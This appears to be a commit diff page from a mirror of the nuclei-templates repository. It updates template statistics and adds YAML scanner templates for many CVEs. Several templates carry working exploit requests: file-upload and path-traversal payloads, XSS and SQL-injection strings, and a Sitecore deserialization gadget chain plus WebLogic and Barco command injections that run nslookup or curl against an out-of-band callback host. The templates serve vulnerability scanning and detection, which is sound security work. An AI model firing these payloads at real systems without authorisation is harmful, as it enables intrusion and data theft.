daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into token-spray-fix

patch-1
Prince Chaddha 2021-11-10 15:23:35 +05:30 committed by GitHub
parent 462c4f7b12 33fccd20b3
commit 7e19fd22df
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
77 changed files with 2513 additions and 1063 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
| rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
| cve2021 | 169 | madrobot | 65 | file | 57 | | | | |
**178 directories, 2459 files**.
**182 directories, 2531 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1909
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
| rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
| cve2021 | 169 | madrobot | 65 | file | 57 | | | | |

40
cves/2016/CVE-2016-3088.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2016-3088
info:
name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
author: fq_hsu
severity: critical
description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
tags: fileupload,cve,cve2016,apache,activemq
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2016-3088
cwe-id: CWE-20
requests:
- raw:
- |
PUT /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
{{randstr}}
- raw:
- |
GET /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==204"
- "status_code_2==200"
- "contains((body_2), '{{randstr}}')"
condition: and

11
cves/2017/CVE-2017-10271.yaml
View File

@ -39,7 +39,7 @@ requests:
<string>-c</string>
</void>
<void index="2">
<string>wget {{interactsh-url}}</string>
<string>nslookup {{interactsh-url}}</string>
</void>
</array>
<void method="start"/></void>
@ -49,8 +49,13 @@ requests:
<soapenv:Body/>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the DNS interaction
words:
- "http"
- "dns"
- type: status
status:
- 500

38
cves/2017/CVE-2017-10974.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2017-10974
info:
name: Yaws 1.91 - Remote File Disclosure
author: 0x_Akoko
severity: high
description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080
reference:
- https://www.exploit-db.com/exploits/42303
- https://nvd.nist.gov/vuln/detail/CVE-2017-10974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-10974
cwe-id: CWE-22
tags: cve,cve2017,yaws,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/%5C../ssl/yaws-key.pem"
matchers-condition: and
matchers:
- type: word
words:
- "BEGIN RSA PRIVATE KEY"
- type: status
status:
- 200
- type: dsl
dsl:
- '!contains(tolower(body), "<html")'
- '!contains(tolower(body), "<HTML")'
condition: or

36
cves/2017/CVE-2017-15363.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2017-15363
info:
name: Typo3 Restler Extension - Local File Disclosure
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
reference:
- https://www.exploit-db.com/exploits/42985
- https://www.cvedetails.com/cve/CVE-2017-15363
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-15363
cwe-id: CWE-98
tags: cve,cve2017,restler,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "'host'"
- "'database'"
- "'extConf'"
- "'debug'"
condition: and
- type: status
status:
- 200

31
cves/2017/CVE-2017-5982.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2017-5982
info:
name: Kodi 17.1 Local File Inclusion
author: 0x_Akoko
severity: high
description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
reference:
- https://cxsecurity.com/issue/WLB-2017020164
- https://www.cvedetails.com/cve/CVE-2017-5982
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-5982
cwe-id: CWE-98
tags: cve,cve2017,kodi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

2
cves/2018/CVE-2018-10093.yaml
View File

@ -25,7 +25,7 @@ requests:
- type: regex
regex:
- "admin:.*:"
- "admin:.*:*sh$"
- type: status
status:

33
cves/2018/CVE-2018-2791.yaml
View File

@ -1,11 +1,10 @@
id: CVE-2018-2791
info:
name: Oracle WebCenter Sites XSS
author: madrobot
name: Oracle WebCenter Sites Multiple XSS
author: madrobot,leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
tags: cve,cve2018,oracle,xss
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.20
@ -15,20 +14,30 @@ info:
- http://www.securitytracker.com/id/1040695
- http://www.securityfocus.com/bid/103800
- https://www.exploit-db.com/exploits/44752/
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2018,oracle,xss,wcs
requests:
- method: GET
path:
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{BaseURL}}
matchers-condition: and
- |
GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
Host: {{BaseURL}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "<h1xxx<scriptalert(1)</script"
part: body
words:
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
- type: word
part: body
words:
- "text/html"
part: header
- '<script>alert(24)</script>'
- 'Missing translation key'
condition: and

45
cves/2018/CVE-2018-3238.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2018-3238
info:
name: Multiple XSS Oracle WebCenter Sites
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2018-3238
tags: cve,cve2018,oracle,wcs,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
cvss-score: 6.90
cve-id: CVE-2018-3238
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Variables.cs_imagedir'
condition: and

57
cves/2019/CVE-2019-1821.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2019-1821
info:
name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821)
author: _0xf4n9x_
severity: critical
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
reference:
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
metadata:
shodan-query: 'http.title:"prime infrastructure"'
tags: rce,fileupload,unauth,cve,cve2019
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-1821
cwe-id: CWE-20
requests:
- raw:
- |
POST /servlet/UploadServlet HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Primary-IP: 127.0.0.1
Filename: test.tar
Filesize: 10240
Compressed-Archive: false
Destination-Dir: tftpRoot
Filecount: 1
Content-Length: 269
Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
--871a4a346a547cf05cb83f57b9ebcb83
Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}
--871a4a346a547cf05cb83f57b9ebcb83--
- |
GET /test.txt HTTP/1.1
Host: {{Host}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains((body_2), '{{randstr}}')"
condition: and

31
cves/2019/CVE-2019-2578.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2019-2578
info:
name: Broken Access Control Oracle WebCenter Sites
author: leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2019,oracle,wcs,auth-bypass
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2019-2578
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'

51
cves/2019/CVE-2019-2579.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2019-2579
info:
name: Oracle WebCenter Sites - SQL Injection
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
tags: cve,cve2019,oracle,wcs,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-2579
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
POST /cs/ContentServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
cookie-reuse: true
extractors:
- type: regex
name: authkey
part: body
internal: true
group: 1
regex:
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
matchers-condition: and
matchers:
- type: word
words:
- "value='&#39; and &#39;1&#39;=&#39;0 --"
- "Use this utility to view and manage URLs"
condition: and
- type: status
status:
- 200

33
cves/2019/CVE-2019-3929.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2019-3929
info:
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
author: _0xf4n9x_
severity: critical
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
reference:
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
- https://www.exploit-db.com/exploits/46786/
- https://nvd.nist.gov/vuln/detail/CVE-2019-3929
tags: rce,cve,cve2019,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-3929
cwe-id: CWE-78
requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/file_transfer.cgi"
body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

50
cves/2020/CVE-2020-26413.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2020-26413
info:
name: Gitlab User enumeration via Graphql API
author: _0xf4n9x_,pikpikcu
severity: medium
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
reference:
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
tags: cve,cve2020,gitlab,exposure,enum
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-26413
cwe-id: CWE-200
requests:
- raw:
- |
POST /api/graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }",
"variables": null,
"operationName": null
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"avatarUrl":'
- '"node":'
condition: and
- type: status
status:
- 200
extractors:
- type: json
part: body
json:
- '.data.users.edges[].node.email'

2
cves/2021/CVE-2021-22205.yaml
View File

@ -60,4 +60,4 @@ requests:
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'

34
cves/2021/CVE-2021-31602.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-31602
info:
name: Pentaho <= 9.1 Authentication Bypass of Spring APIs
author: pussycat0x
severity: medium
reference:
- https://seclists.org/fulldisclosure/2021/Nov/13
- https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software
- https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
metadata:
shodan-query: 'Pentaho'
tags: cve,cve2021,pentaho,auth-bypass
description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n"
requests:
- method: GET
path:
- "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js"
- "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<roleList>'
- '<roles>Anonymous</roles>'
condition: and
- type: status
status:
- 200

12
cves/2021/CVE-2021-33044.yaml
View File

@ -25,8 +25,8 @@ requests:
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{{Hostname}}/
Referer: http://{{Hostname}}/
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
@ -40,10 +40,10 @@ requests:
- type: word
part: body
words:
- "\"result\":true"
- "id"
- "params"
- "session"
- '"result":true'
- 'id'
- 'params'
- 'session'
condition: and
extractors:

7
cves/2021/CVE-2021-36260.yaml
View File

@ -33,15 +33,12 @@ requests:
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
- type: status
status:
- 200
- "status_code_1 == 500 && status_code_2 == 200"
condition: and
extractors:
- type: regex

46
cves/2021/CVE-2021-41174.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
tags: cve,cve2021,grafana,xss
metadata:
shodan-query: title:"Grafana"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-41174
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Grafana"
- "frontend_boot_js_done_time_seconds"
condition: and
- type: regex
regex:
- '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))'
extractors:
- type: regex
group: 1
regex:
- '"subTitle":"Grafana ([a-z0-9.]+)'

114
cves/2021/CVE-2021-42237.yaml Normal file
View File

@ -0,0 +1,114 @@
id: CVE-2021-42237
info:
name: Sitecore Experience Platform Pre-Auth RCE
author: pdteam
severity: critical
description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
reference:
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
- https://nvd.nist.gov/vuln/detail/CVE-2021-42237
remediation:
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
metadata:
shodan-query: http.title:"SiteCore"
tags: rce,sitecore,deserialization,oast
requests:
- raw:
- |
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0" ?>
<a>
<query></query>
<source>foo</source>
<parameters>
<parameter name="">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
xmlns:x="http://www.w3.org/2001/XMLSchema"
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Count>
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
xmlns="">
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
xmlns:a="http://schemas.datacontract.org/2004/07/System">
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
xmlns="">
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
<a:delegateEntry z:Id="7">
<a:assembly z:Ref="6" i:nil="true"/>
<a:delegateEntry i:nil="true"/>
<a:methodName z:Id="8">Compare</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</a:delegateEntry>
<a:methodName z:Id="11">Start</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</Delegate>
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="11" i:nil="true"/>
<AssemblyName z:Ref="12" i:nil="true"/>
<ClassName z:Ref="13" i:nil="true"/>
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method0>
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="8" i:nil="true"/>
<AssemblyName z:Ref="6" i:nil="true"/>
<ClassName z:Ref="9" i:nil="true"/>
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method1>
</_comparison>
</Comparer>
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Version>
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
xmlns="">
<string z:Id="25"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
<string z:Id="26"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
</Items>
</ArrayOfstring>
</parameter>
</parameters>
</a>
matchers-condition: and
matchers:
- type: word
